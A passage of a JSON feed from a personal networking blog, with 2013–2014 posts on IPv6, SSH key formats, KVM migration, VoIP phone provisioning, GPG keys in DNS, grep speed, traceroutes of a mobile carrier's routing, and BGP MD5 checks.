http://<PHONEIP>/admin/config.xml", "url": "https://blog.x-way.org/Networking/2014/08/30/Sipura-Linksys-Cisco-SPA901-SPA3102-download-current-configuration.html", "tags": ["Networking"], "date_published": "2014-08-30T22:16:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324221", "title": "Native IPv6", "content_text": "Yesterday I switched our DSL Link to green.ch. Now we not only have a higher bandwidth (thanks to VDSL) but also native IPv6 connectivity!Especially nice is that it all works out of the box. After plugging in the pre-configured FritzBox, it automatically gets an IPv6 prefix via Prefix Delegation and announces it to the clients in the LAN.08:05 [ aj @ actuarius : ~ ] % mtr -rc5 www.open.chStart: Fri Jul 25 08:06:42 2014HOST: actuarius.fritz.box Loss% Snt Last Avg Best Wrst StDev 1.|-- fritz.box 0.0% 5 0.8 0.8 0.7 0.8 0.0 2.|-- 2a01:2a8::121 0.0% 5 8.6 8.7 8.5 9.2 0.0 3.|-- 2a01:2a8:0:5a::1 0.0% 5 8.4 8.2 8.0 8.4 0.0 4.|-- 2a01:2a8:1:7::4 0.0% 5 8.1 8.6 8.1 9.6 0.0 5.|-- 2a00:db0:9:a06::5 0.0% 5 8.8 8.6 8.3 8.8 0.0 6.|-- www.open.ch 0.0% 5 8.9 8.7 8.6 8.9 0.0", "content_html": "
Yesterday I switched our DSL Link to green.ch. Now we not only have a higher bandwidth (thanks to VDSL) but also native IPv6 connectivity!
Especially nice is that it all works out of the box. After plugging in the pre-configured FritzBox, it automatically gets an IPv6 prefix via Prefix Delegation and announces it to the clients in the LAN.
08:05 [ aj @ actuarius : ~ ] % mtr -rc5 www.open.chStart: Fri Jul 25 08:06:42 2014HOST: actuarius.fritz.box Loss% Snt Last Avg Best Wrst StDev 1.|-- fritz.box 0.0% 5 0.8 0.8 0.7 0.8 0.0 2.|-- 2a01:2a8::121 0.0% 5 8.6 8.7 8.5 9.2 0.0 3.|-- 2a01:2a8:0:5a::1 0.0% 5 8.4 8.2 8.0 8.4 0.0 4.|-- 2a01:2a8:1:7::4 0.0% 5 8.1 8.6 8.1 9.6 0.0 5.|-- 2a00:db0:9:a06::5 0.0% 5 8.8 8.6 8.3 8.8 0.0 6.|-- www.open.ch 0.0% 5 8.9 8.7 8.6 8.9 0.0", "url": "https://blog.x-way.org/Networking/2014/07/25/Native-IPv6.html", "tags": ["Networking"], "date_published": "2014-07-25T08:08:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324220", "title": "12 Years", "content_text": "12 years ago I started this weblog with a link to www.2advanced.com.It's now 555 posts later and I think what is most unexpected (besides that this weblog is still existing 12 years later), is that this first link from my first post is still valid (and still pointing to some Flash-only website...).So far this weblog has survived 2 different domains, 3 different servers, multiple versions of a self-made blogging-engine, about 6 different layout designs, a database-crash, recovery via archive.org and a migration to Jekyll.No guarantee that it will last another 12 years, but for the meantime: Cheers, and enjoy the ride!", "content_html": "
12 years ago I started this weblog with a link to www.2advanced.com.
It's now 555 posts later and I think what is most unexpected (besides that this weblog is still existing 12 years later), is that this first link from my first post is still valid (and still pointing to some Flash-only website...).
So far this weblog has survived 2 different domains, 3 different servers, multiple versions of a self-made blogging-engine, about 6 different layout designs, a database-crash, recovery via archive.org and a migration to Jekyll.
No guarantee that it will last another 12 years, but for the meantime: Cheers, and enjoy the ride!
", "url": "https://blog.x-way.org/Misc/2014/06/03/12-Years.html", "tags": ["Misc"], "date_published": "2014-06-03T08:50:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324219", "title": "It's alive!", "content_text": "Wandtelefon Modell 50 from January 1970 now talks SIP (and it only took two converters, a bit of cable-fiddling and some luck :-)", "content_html": "Wandtelefon Modell 50 from January 1970 now talks SIP (and it only took two converters, a bit of cable-fiddling and some luck :-)
", "url": "https://blog.x-way.org/Networking/2014/05/28/Its-alive.html", "tags": ["Networking"], "date_published": "2014-05-28T23:19:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324218", "title": "Stop BĂPF!", "content_text": "", "content_html": "", "url": "https://blog.x-way.org/Networking/2014/05/22/Stop-BUPF.html", "tags": ["Networking"], "date_published": "2014-05-22T19:55:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324217", "title": "Load PKCS#8 SSH key files in Mac OS X 10.9", "content_text": "There is currently a bug in Mac OS X 10.9 which causes that ssh-add is no longer able to read SSH key files in PKCS#8 format.Fortunately ssh-add still reads PKCS#8 keys when provided through STDIN and openssl is able to decrypt PKCS#8 keys.Thus the following workaround so that PKCS#8 SSH keys can be loaded again:openssl pkcs8 -in ~/.ssh/id_rsa | ssh-add -", "content_html": "There is currently a bug in Mac OS X 10.9 which causes that ssh-add is no longer able to read SSH key files in PKCS#8 format.
Fortunately ssh-add still reads PKCS#8 keys when provided through STDIN and openssl is able to decrypt PKCS#8 keys.
Thus the following workaround so that PKCS#8 SSH keys can be loaded again:
openssl pkcs8 -in ~/.ssh/id_rsa | ssh-add -", "url": "https://blog.x-way.org/Networking/2014/04/18/Load-PKCS8-SSH-key-files-in-Mac-OS-X-10-9.html", "tags": ["Networking"], "date_published": "2014-04-18T14:36:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324216", "title": "Facebook: The Road To IPv6", "content_text": "Great presentation by Paul Saab about the IPv6 introduction at Facebook: The Road To IPv6(via)", "content_html": "
Great presentation by Paul Saab about the IPv6 introduction at Facebook: The Road To IPv6
(via)
", "url": "https://blog.x-way.org/Networking/2014/03/23/Facebook-The-Road-To-IPv6.html", "tags": ["Networking"], "date_published": "2014-03-23T15:09:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324214", "title": "Moving a KVM guest to another machine", "content_text": "\tProperly shutdown the guest: guest# poweroff\tCreate an LVM volume of the same size on the new machine: newmachine# lvcreate -L 120G -n myguest myvolgroup\tCopy the disk from the old machine over to the new one: oldmachine# dd if=/dev/vg_foo/lv_bar | ssh newmachine dd of=/dev/volgroup/myguest\tWait for the transfer to complete (on a 100Mbit/s connection it took about 3.5 hours to transfer the 120GB).\tCopy /etc/libvirt/qemu/myguest.xml from the old machine over to the new machine and adapt the LVM path for the disk.\tReload the libvirt configuration: newmachine# /etc/init.d/libvirt-bin reload\tStart up the guest on the new machine: newmachine# virsh start myguest", "content_html": "guest# poweroff
newmachine# lvcreate -L 120G -n myguest myvolgroup
oldmachine# dd if=/dev/vg_foo/lv_bar | ssh newmachine dd of=/dev/volgroup/myguest
newmachine# /etc/init.d/libvirt-bin reload
newmachine# virsh start myguest
e2fsck -f /dev/vg_foo/lv_bar
resize2fs /dev/vg_foo/lv_bar 180G
lvreduce -L 190G /dev/vg_foo/lv_bar
resize2fs /dev/vg_foo/lv_bar
e2fsck -f /dev/vg_foo/lv_bar
When renewing certificates it is a good idea to verify that the newly installed SSL certificate matches the newly installed private key (eg. to make sure no mixup between the new and old files occurred).
This can be done by comparing the modulus of the two files:
openssl x509 -in <certificatefile> -noout -modulus|sha1sumopenssl rsa -in <privatekeyfile> -noout -modulus|sha1sum", "url": "https://blog.x-way.org/Networking/2014/01/19/Verify-that-an-SSL-certificate-matches-the-private-key.html", "tags": ["Networking"], "date_published": "2014-01-19T13:32:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324212", "title": "Sipura/Linksys/Cisco SPA901 Provisioning and Upgrade", "content_text": "Loading the configuration from http://config.server/configfile.xml (provisioning has to be enabled on the phone):http://<PHONEIP>/admin/resync?http://config.server/configfile.xmlUpgrading the firmware with the image from http://upgrade.server/firmware.bin:http://<PHONEIP>/upgrade?http://upgrade.server/firmware.bin", "content_html": "
Loading the configuration from http://config.server/configfile.xml (provisioning has to be enabled on the phone):
http://<PHONEIP>/admin/resync?http://config.server/configfile.xml
Upgrading the firmware with the image from http://upgrade.server/firmware.bin:
http://<PHONEIP>/upgrade?http://upgrade.server/firmware.bin", "url": "https://blog.x-way.org/Networking/2014/01/12/Sipura-Linksys-Cisco-SPA901-Provisioning-and-Upgrade.html", "tags": ["Networking"], "date_published": "2014-01-12T21:02:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324211", "title": "Publish GPG Keys in DNS", "content_text": "Create the PKA DNS record:# localpart=andreas domain=jaggi.info url=http://andreas-jaggi.ch/1C6AC951.asc# LANG=C gpg --fingerprint ${localpart}@${domain}|awk -v local=$localpart -v domain=$domain -v url=$url \\'/fingerprint/{printf(\"%s._pka.%s. TXT \\\"v=pka1;fpr=%s;uri=%s\\\"\\n\",local,domain,$4$5$6$7$8$9$10$11$12$13,url)}'andreas._pka.jaggi.info. TXT \"v=pka1;fpr=1073501542F38352FC85788207A32EAB1C6AC951;uri=http://andreas-jaggi.ch/1C6AC951.asc\"Test DNS resolution:# dig +short -t txt andreas._pka.jaggi.info.\"v=pka1\\;fpr=1388580990F38352FC85788207A32EAB1C6AC951\\;uri=http://andreas-jaggi.ch/1C6AC951.asc\"Test with GPG:# gpg --auto-key-locate pka -ea -r ${localpart}@${domain}Detailed explanation of the different DNS publication mechanisms for PGP Keys:Publishing PGP Keys in DNS(via)", "content_html": "
Create the PKA DNS record:
# localpart=andreas domain=jaggi.info url=http://andreas-jaggi.ch/1C6AC951.asc# LANG=C gpg --fingerprint ${localpart}@${domain}|awk -v local=$localpart -v domain=$domain -v url=$url \\'/fingerprint/{printf(\"%s._pka.%s. TXT \\\"v=pka1;fpr=%s;uri=%s\\\"\\n\",local,domain,$4$5$6$7$8$9$10$11$12$13,url)}'andreas._pka.jaggi.info. TXT \"v=pka1;fpr=1073501542F38352FC85788207A32EAB1C6AC951;uri=http://andreas-jaggi.ch/1C6AC951.asc\"
Test DNS resolution:
# dig +short -t txt andreas._pka.jaggi.info.\"v=pka1\\;fpr=1388580990F38352FC85788207A32EAB1C6AC951\\;uri=http://andreas-jaggi.ch/1C6AC951.asc\"
Test with GPG:
# gpg --auto-key-locate pka -ea -r ${localpart}@${domain}
Detailed explanation of the different DNS publication mechanisms for PGP Keys:
Publishing PGP Keys in DNS
(via)
", "url": "https://blog.x-way.org/Networking/2014/01/01/Publish-GPG-Keys-in-DNS.html", "tags": ["Networking"], "date_published": "2014-01-01T13:52:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324210", "title": "Improve the security of your SSH private key files with PKCS#8", "content_text": "Instead of the easily brute-forceable one-pass MD5/AES128 password protection format used by SSH per default, you should use the PKCS#8 format to store your private key files. PKCS#8 allows to choose proper key-derivation functions and encryption schemes (for example PBKDF2 and PBES2).The following commands convert an existing password protected SSH private key file to PKCS#8 format (using PBKDF2, PBES2 and AES-256):mv ~/.ssh/id_rsa{,.old}openssl pkcs8 -topk8 -v2 aes256 -in ~/.ssh/id_rsa.old -out ~/.ssh/id_rsachmod 600 ~/.ssh/id_rsarm ~/.ssh/id_rsa.old(via Martin Kleppmann)", "content_html": "Instead of the easily brute-forceable one-pass MD5/AES128 password protection format used by SSH per default, you should use the PKCS#8 format to store your private key files. PKCS#8 allows to choose proper key-derivation functions and encryption schemes (for example PBKDF2 and PBES2).
The following commands convert an existing password protected SSH private key file to PKCS#8 format (using PBKDF2, PBES2 and AES-256):
mv ~/.ssh/id_rsa{,.old}openssl pkcs8 -topk8 -v2 aes256 -in ~/.ssh/id_rsa.old -out ~/.ssh/id_rsachmod 600 ~/.ssh/id_rsarm ~/.ssh/id_rsa.old
(via Martin Kleppmann)
", "url": "https://blog.x-way.org/Networking/2013/12/29/Improve-the-security-of-your-SSH-private-key-files-with-PKCS8.html", "tags": ["Networking"], "date_published": "2013-12-29T15:23:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324209", "title": "Make grep 50x faster", "content_text": "Found this neat trick in Brendan Gregg's Blazing Performance with Flame Graphs talk.Switching to LANG=C improved performance by 2000xIn a quick test I directly got a performance gain of factor 50.22.This is quite an achievement for only changing one environment variable.real:~# du -sh /var/log/querylog 148M\t/var/log/querylogreal:~# time grep -i e /var/log/querylog > /dev/null real\t0m12.807suser\t0m12.437ssys\t0m0.068sreal:~# time LANG=C grep -i e /var/log/querylog > /dev/nullreal\t0m0.255suser\t0m0.196ssys\t0m0.052sI suspect that the performance gain may vary quite a lot depending on the search pattern.Also, please note that this trick only works when you know that the involved files and search patterns are ASCII only.(via Standalone Sysadmin)", "content_html": "Found this neat trick in Brendan Gregg's Blazing Performance with Flame Graphs talk.
Switching to LANG=C improved performance by 2000x
In a quick test I directly got a performance gain of factor 50.22.
This is quite an achievement for only changing one environment variable.
real:~# du -sh /var/log/querylog 148M\t/var/log/querylogreal:~# time grep -i e /var/log/querylog > /dev/null real\t0m12.807suser\t0m12.437ssys\t0m0.068sreal:~# time LANG=C grep -i e /var/log/querylog > /dev/nullreal\t0m0.255suser\t0m0.196ssys\t0m0.052s
I suspect that the performance gain may vary quite a lot depending on the search pattern.Also, please note that this trick only works when you know that the involved files and search patterns are ASCII only.
(via Standalone Sysadmin)
", "url": "https://blog.x-way.org/Linux/2013/12/15/Make-grep-50x-faster.html", "tags": ["Linux"], "date_published": "2013-12-15T14:33:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324208", "title": "WOODKID", "content_text": "Another nice discovery from Metropop: WOODKID", "content_html": "Another nice discovery from Metropop: WOODKID
", "url": "https://blog.x-way.org/Music/2013/12/01/WOODKID.html", "tags": ["Music"], "date_published": "2013-12-01T12:36:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324207", "title": "Major Look - Too Late", "content_text": "", "content_html": "", "url": "https://blog.x-way.org/Music/2013/08/21/Major-Look-Too-Late.html", "tags": ["Music"], "date_published": "2013-08-21T14:15:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324206", "title": "Mandatory requirement for all non IPv6 capable products", "content_text": "(via blog.quux.de)", "content_html": "(via blog.quux.de)
", "url": "https://blog.x-way.org/Networking/2013/07/05/Mandatory-requirement-for-all-non-IPv6-capable-products.html", "tags": ["Networking"], "date_published": "2013-07-05T09:37:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324205", "title": "Run your own DynDNS server", "content_text": "After receiving yet another 'please login and click through our captcha for no reason' e-mail from a DynDNS provider, I decided to run my own DynDNS server.As I already run my own DNS servers, this was just a matter of adding a dynamically updateable zone and writing a script which receives the IP change request via HTTP and sends out a DNS update.Luckily the DynDNS API is quite well documented and I quickly came up with the PHP code below which performs the task well enough for me. Feel free to use it to run your own DynDNS server.PS: to any friends reading this and looking for a DynDNS service: drop me a message and I'll set you up with an account.", "content_html": "After receiving yet another 'please login and click through our captcha for no reason' e-mail from a DynDNS provider, I decided to run my own DynDNS server.
As I already run my own DNS servers, this was just a matter of adding a dynamically updateable zone and writing a script which receives the IP change request via HTTP and sends out a DNS update.
Luckily the DynDNS API is quite well documented and I quickly came up with the PHP code below which performs the task well enough for me. Feel free to use it to run your own DynDNS server.
PS: to any friends reading this and looking for a DynDNS service: drop me a message and I'll set you up with an account.
", "url": "https://blog.x-way.org/Networking/2013/06/01/Run-your-own-DynDNS-server.html", "tags": ["Networking"], "date_published": "2013-06-01T21:11:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324204", "title": "glue_records.sh", "content_text": "Get the glue records for a given domain:", "content_html": "Get the glue records for a given domain:
", "url": "https://blog.x-way.org/Networking/2013/05/28/glue_records-sh.html", "tags": ["Networking"], "date_published": "2013-05-28T18:37:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324203", "title": "update_serials.sh", "content_text": "Update the serial number in BIND zone files with the current unix timestamp.", "content_html": "Update the serial number in BIND zone files with the current unix timestamp.
", "url": "https://blog.x-way.org/Networking/2013/05/26/update_serials-sh.html", "tags": ["Networking"], "date_published": "2013-05-26T08:29:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324202", "title": "less with colors", "content_text": "For a long time it annoyed me everytime that less only showed ASCII codes instead of colors when piping some 'color-enabled' output into it.Turns out there is an easy fix for that:colordiff a/foo b/foo | less -RThanks to Major Hayden for this very useful tip!", "content_html": "For a long time it annoyed me everytime that less only showed ASCII codes instead of colors when piping some 'color-enabled' output into it.
Turns out there is an easy fix for that:
colordiff a/foo b/foo | less -R
Thanks to Major Hayden for this very useful tip!
", "url": "https://blog.x-way.org/Linux/2013/05/25/less-with-colors.html", "tags": ["Linux"], "date_published": "2013-05-25T19:29:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324201", "title": "Howto generate DH parameters for OpenVPN", "content_text": "openssl gendh -out dh4096.pem 4096", "content_html": "openssl gendh -out dh4096.pem 4096", "url": "https://blog.x-way.org/Linux/2013/02/27/Howto-generate-DH-parameters-for-OpenVPN.html", "tags": ["Linux"], "date_published": "2013-02-27T18:29:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324200", "title": "Orange Routing 2", "content_text": "I did another test of the Orange Routing.Running a traceroute to my server in Zurich and one to my vhost in Frankfurt.First another version of the already familier traceroute to my server in Zurich:HOST: Andreass-MacBook-Pro.local Loss% Snt Last Avg Best Wrst StDev 1.|-- 172.20.10.1 0.0% 5 8.0 3.7 2.1 8.0 2.5 2.|-- 10.8.8.67 0.0% 5 174.8 114.9 56.7 205.6 69.8 3.|-- 10.8.12.10 0.0% 5 126.8 108.4 67.7 171.3 42.8 4.|-- 192.168.249.201 0.0% 5 73.4 82.7 61.9 111.5 20.5 5.|-- 192.168.253.191 0.0% 5 54.0 64.9 54.0 75.9 9.3 6.|-- 192.168.250.203 0.0% 5 64.7 69.2 57.3 79.2 8.4 7.|-- 10.10.10.10 0.0% 5 56.8 65.5 56.8 72.1 7.7 8.|-- 10.255.200.1 0.0% 5 65.9 87.3 60.1 146.6 35.1 9.|-- pos0-1-1-1.gencr1.geneve. 0.0% 5 84.8 117.1 76.4 162.5 36.9 10.|-- pos14-0-1.pascr4.paris.op 0.0% 5 88.1 118.0 88.1 168.3 36.7 11.|-- ge6-0-0.br2.par2.alter.ne 0.0% 5 76.5 90.5 76.5 109.1 12.0 12.|-- so-2-3-0.xt2.zur3.alter.n 0.0% 5 76.8 109.1 76.8 203.2 53.1 13.|-- pos2-0.gw4.zur4.alter.net 0.0% 5 88.8 98.7 84.3 143.4 25.2 14.|-- uch200193-gw.customer.alt 0.0% 5 90.7 85.3 74.1 93.5 8.0 15.|-- whale29.open.ch 0.0% 5 88.9 97.7 88.9 104.7 6.3 16.|-- orca8.open.ch 0.0% 5 90.8 94.8 90.8 102.8 4.9 17.|-- real.jaggi.info 20.0% 5 234.8 130.0 92.8 234.8 69.9Now the traceroute to the vhost in Frankfurt:HOST: Andreass-MacBook-Pro.local Loss% Snt Last Avg Best Wrst StDev 1.|-- 172.20.10.1 0.0% 5 15.2 13.1 1.9 44.5 18.4 2.|-- 10.8.8.115 0.0% 5 72.6 74.0 67.2 81.3 6.8 3.|-- 10.8.12.10 0.0% 5 80.7 75.0 64.0 89.6 10.3 4.|-- 192.168.249.201 0.0% 5 65.1 78.9 65.1 94.0 12.3 5.|-- 192.168.253.191 0.0% 5 73.1 70.4 66.5 73.3 2.8 6.|-- 192.168.250.203 0.0% 5 69.5 73.9 66.3 86.6 7.7 7.|-- 10.10.10.10 0.0% 5 67.0 72.7 67.0 80.0 4.9 8.|-- 10.255.200.1 0.0% 5 70.9 74.4 69.7 86.4 7.0 9.|-- pos0-1-1-1.gencr1.geneve. 0.0% 5 77.2 83.4 75.9 99.4 9.4 10.|-- pos3-1-0.zurcr1.zurich.op 0.0% 5 83.8 103.2 83.8 146.9 26.3 11.|-- pos0-9-4-0.ffttr1.frankfu 0.0% 5 102.9 103.6 98.7 108.8 4.9 12.|-- leaseweb-9.gw.opentransit 0.0% 5 87.6 88.8 85.3 93.2 3.0 13.|-- te3-1.core-2.fra.leaseweb 0.0% 5 85.4 91.5 85.4 106.1 8.5 14.|-- hosted-by.leaseweb.com 0.0% 5 90.2 94.1 84.7 112.5 11.0 15.|-- ??? 100.0 5 0.0 0.0 0.0 0.0 0.0 16.|-- 0.jaggi.info 20.0% 5 89.9 117.5 86.3 205.5 58.7As you can see, the RTT is higher for the server in Zurich than for the vhost in Frankfurt! (keep in mind that source of these measurement is my laptop in the train 8 minutes away from Zurich now)So Orange has higher latency to hosts in the same region/city than to hosts in another country which are more than 350km away. :-(The next time I choose a mobile provider it might be good to analyse its BGP peerings and routing policies first...", "content_html": "
I did another test of the Orange Routing.
Running a traceroute to my server in Zurich and one to my vhost in Frankfurt.
First another version of the already familier traceroute to my server in Zurich:
HOST: Andreass-MacBook-Pro.local Loss% Snt Last Avg Best Wrst StDev 1.|-- 172.20.10.1 0.0% 5 8.0 3.7 2.1 8.0 2.5 2.|-- 10.8.8.67 0.0% 5 174.8 114.9 56.7 205.6 69.8 3.|-- 10.8.12.10 0.0% 5 126.8 108.4 67.7 171.3 42.8 4.|-- 192.168.249.201 0.0% 5 73.4 82.7 61.9 111.5 20.5 5.|-- 192.168.253.191 0.0% 5 54.0 64.9 54.0 75.9 9.3 6.|-- 192.168.250.203 0.0% 5 64.7 69.2 57.3 79.2 8.4 7.|-- 10.10.10.10 0.0% 5 56.8 65.5 56.8 72.1 7.7 8.|-- 10.255.200.1 0.0% 5 65.9 87.3 60.1 146.6 35.1 9.|-- pos0-1-1-1.gencr1.geneve. 0.0% 5 84.8 117.1 76.4 162.5 36.9 10.|-- pos14-0-1.pascr4.paris.op 0.0% 5 88.1 118.0 88.1 168.3 36.7 11.|-- ge6-0-0.br2.par2.alter.ne 0.0% 5 76.5 90.5 76.5 109.1 12.0 12.|-- so-2-3-0.xt2.zur3.alter.n 0.0% 5 76.8 109.1 76.8 203.2 53.1 13.|-- pos2-0.gw4.zur4.alter.net 0.0% 5 88.8 98.7 84.3 143.4 25.2 14.|-- uch200193-gw.customer.alt 0.0% 5 90.7 85.3 74.1 93.5 8.0 15.|-- whale29.open.ch 0.0% 5 88.9 97.7 88.9 104.7 6.3 16.|-- orca8.open.ch 0.0% 5 90.8 94.8 90.8 102.8 4.9 17.|-- real.jaggi.info 20.0% 5 234.8 130.0 92.8 234.8 69.9
Now the traceroute to the vhost in Frankfurt:
HOST: Andreass-MacBook-Pro.local Loss% Snt Last Avg Best Wrst StDev 1.|-- 172.20.10.1 0.0% 5 15.2 13.1 1.9 44.5 18.4 2.|-- 10.8.8.115 0.0% 5 72.6 74.0 67.2 81.3 6.8 3.|-- 10.8.12.10 0.0% 5 80.7 75.0 64.0 89.6 10.3 4.|-- 192.168.249.201 0.0% 5 65.1 78.9 65.1 94.0 12.3 5.|-- 192.168.253.191 0.0% 5 73.1 70.4 66.5 73.3 2.8 6.|-- 192.168.250.203 0.0% 5 69.5 73.9 66.3 86.6 7.7 7.|-- 10.10.10.10 0.0% 5 67.0 72.7 67.0 80.0 4.9 8.|-- 10.255.200.1 0.0% 5 70.9 74.4 69.7 86.4 7.0 9.|-- pos0-1-1-1.gencr1.geneve. 0.0% 5 77.2 83.4 75.9 99.4 9.4 10.|-- pos3-1-0.zurcr1.zurich.op 0.0% 5 83.8 103.2 83.8 146.9 26.3 11.|-- pos0-9-4-0.ffttr1.frankfu 0.0% 5 102.9 103.6 98.7 108.8 4.9 12.|-- leaseweb-9.gw.opentransit 0.0% 5 87.6 88.8 85.3 93.2 3.0 13.|-- te3-1.core-2.fra.leaseweb 0.0% 5 85.4 91.5 85.4 106.1 8.5 14.|-- hosted-by.leaseweb.com 0.0% 5 90.2 94.1 84.7 112.5 11.0 15.|-- ??? 100.0 5 0.0 0.0 0.0 0.0 0.0 16.|-- 0.jaggi.info 20.0% 5 89.9 117.5 86.3 205.5 58.7
As you can see, the RTT is higher for the server in Zurich than for the vhost in Frankfurt! (keep in mind that source of these measurement is my laptop in the train 8 minutes away from Zurich now)
So Orange has higher latency to hosts in the same region/city than to hosts in another country which are more than 350km away. :-(
The next time I choose a mobile provider it might be good to analyse its BGP peerings and routing policies first...
While in the train from Bern to Zurich, I did a traceroute towards the server which currently hosts this weblog (it is located at Open Systems in Zurich). The connection starts on my laptop and is thethered via my cell to the Orange backbone.
HOST: Andreass-MacBook-Pro.local Loss% Snt Last Avg Best Wrst StDev 1.|-- 172.20.10.1 0.0% 5 2.0 12.1 1.7 33.2 14.6 2.|-- 10.8.8.67 0.0% 5 52.2 373.4 52.2 1241. 504.8 3.|-- 10.8.12.10 0.0% 5 50.9 347.4 50.9 1143. 453.3 4.|-- 192.168.249.201 0.0% 5 51.2 282.7 51.2 1042. 426.8 5.|-- 192.168.253.191 0.0% 5 51.2 226.2 44.5 942.2 400.3 6.|-- 192.168.250.203 0.0% 5 51.4 206.7 37.9 847.5 358.2 7.|-- 10.10.10.10 0.0% 5 50.0 181.4 29.6 746.9 316.2 8.|-- 10.255.200.1 0.0% 5 50.0 172.2 36.9 645.6 264.9 9.|-- 193.251.248.145 0.0% 4 60.2 59.8 46.2 81.9 15.8 10.|-- 193.251.240.53 0.0% 4 70.0 76.4 64.9 101.6 16.9 11.|-- 146.188.112.77 0.0% 4 70.4 74.0 69.2 83.8 6.7 12.|-- 146.188.5.1 0.0% 4 70.6 71.7 58.1 88.1 12.3 13.|-- 146.188.4.194 0.0% 4 70.5 61.9 51.6 70.9 10.2 14.|-- 146.188.64.74 0.0% 4 71.3 69.2 58.8 75.4 7.2 15.|-- 213.156.230.29 0.0% 4 71.5 78.3 62.6 108.9 20.7 16.|-- 213.156.229.8 0.0% 4 72.2 75.2 70.4 81.9 5.1 17.|-- 213.156.229.222 25.0% 4 80.8 76.2 61.2 86.5 13.3
You can see that the traffic is passed through 8 different routers inside the Orange backbone (using IPs from all three RFC1918 ranges...) before it is let onto the Internet.
And then the real fun starts (let's use DNS names for this):
HOST: Andreass-MacBook-Pro.local Loss% Snt Last Avg Best Wrst StDev 1.|-- 172.20.10.1 0.0% 5 2.0 12.2 1.9 33.3 14.5 2.|-- 10.8.8.67 0.0% 5 44.2 345.6 27.0 1167. 494.2 3.|-- 10.8.12.10 0.0% 5 52.2 308.9 27.0 1104. 462.4 4.|-- 192.168.249.201 0.0% 5 33.4 264.9 27.2 1014. 427.1 5.|-- 192.168.253.191 0.0% 5 30.3 227.5 27.3 952.9 406.4 6.|-- 192.168.250.203 0.0% 5 50.4 200.7 27.0 860.0 368.7 7.|-- 10.10.10.10 0.0% 5 72.4 193.5 30.5 779.2 327.8 8.|-- 10.255.200.1 0.0% 5 31.8 166.8 27.6 688.0 291.5 9.|-- pos0-1-1-1.gencr1.geneve. 0.0% 4 50.8 55.0 47.6 67.1 8.6 10.|-- pos14-0-1.pascr4.paris.op 0.0% 4 61.0 64.4 57.7 78.5 9.5 11.|-- ge6-0-0.br2.par2.alter.ne 0.0% 4 70.8 56.3 48.4 70.8 9.9 12.|-- so-2-3-0.xt2.zur3.alter.n 0.0% 4 108.9 65.6 48.0 108.9 29.2 13.|-- pos2-0.gw4.zur4.alter.net 0.0% 4 51.7 55.5 50.3 68.8 8.8 14.|-- uch200193-gw.customer.alt 0.0% 4 171.8 83.6 50.7 171.8 58.8 15.|-- whale29.open.ch 0.0% 4 132.1 90.0 59.2 132.1 32.7 16.|-- orca8.open.ch 0.0% 4 72.4 66.8 58.6 73.5 7.3 17.|-- real.jaggi.info 25.0% 4 80.2 64.7 56.2 80.2 13.4
As we see, Orange injects their mobile data traffic into the Internet in Geneva (pos0-1-1-1.gencr1.geneve.).
Then it is first sent to Paris (pas14-0-1.pascr4.paris.op and ge6-0-0.br2.par2.alter.ne) and from there back to Zurich (so-2-3-0.xt2.yur3.alter.n and all the following hosts).
I can kind of understand that the traffic is routed via Geneva (main Orange infrastructure is there), but why is it sent to Paris? (especially since Geneva<->Zurich is the main Internet connection inside Switzerland where most of the countries fiber is buried).
I guess this explains why my mobile data speed is not always as fast as I like it to be...
", "url": "https://blog.x-way.org/Networking/2013/02/25/Orange-Routing.html", "tags": ["Networking"], "date_published": "2013-02-25T12:34:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324198", "title": "Administrative Distance", "content_text": "When using more than one dynamic routing protocol, make sure to know their administrative distance.Further it is usually a bad idea to redistribute routes from a dynamic routing protocol into another one with a lower administrative distance. Especially when having multiple handover points between the two protocols.", "content_html": "When using more than one dynamic routing protocol, make sure to know their administrative distance.
Further it is usually a bad idea to redistribute routes from a dynamic routing protocol into another one with a lower administrative distance. Especially when having multiple handover points between the two protocols.
", "url": "https://blog.x-way.org/Networking/2013/02/18/Administrative-Distance.html", "tags": ["Networking"], "date_published": "2013-02-18T08:39:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324197", "title": "I ♡ snow", "content_text": "", "content_html": "", "url": "https://blog.x-way.org/Misc/2013/02/17/I-love-snow.html", "tags": ["Misc"], "date_published": "2013-02-17T17:31:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324196", "title": "Computer Science", "content_text": "via boingboing.net", "content_html": "
via boingboing.net
The HAVP blacklist script chocked on some entries from PhishTank. These issues have been fixed with some more sed magic and I've put and updated version of the script on Github.
", "url": "https://blog.x-way.org/Linux/2013/02/13/Updated-HAVP-blacklist-script.html", "tags": ["Linux"], "date_published": "2013-02-13T18:02:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324194", "title": "Verify a BGP MD5 password before session turnup", "content_text": "When setting up a new BGP peering, you may want to test if your peering partner uses the correct MD5 password without bringing up your side of the session.For this the tcpdump option -M can be used to supply the MD5 password when sniffing the traffic of the new peer:tcpdump -ni eth0 -M MyBgPMd5PaSsWoRd tcp port 179tcpdump will then verify the MD5 signature for every packet where it finds a MD5 signature TCP option as specified in RFC2385.In the output you will see md5valid for packets where your password matches the MD5 signature or md5invalid for packets where your password does not match the MD5 signature.If you see neither md5valid nor md5invalid then the peer did not configure any MD5 BGP password.If you want to check for mismatching MD5 passwords after you bring up the 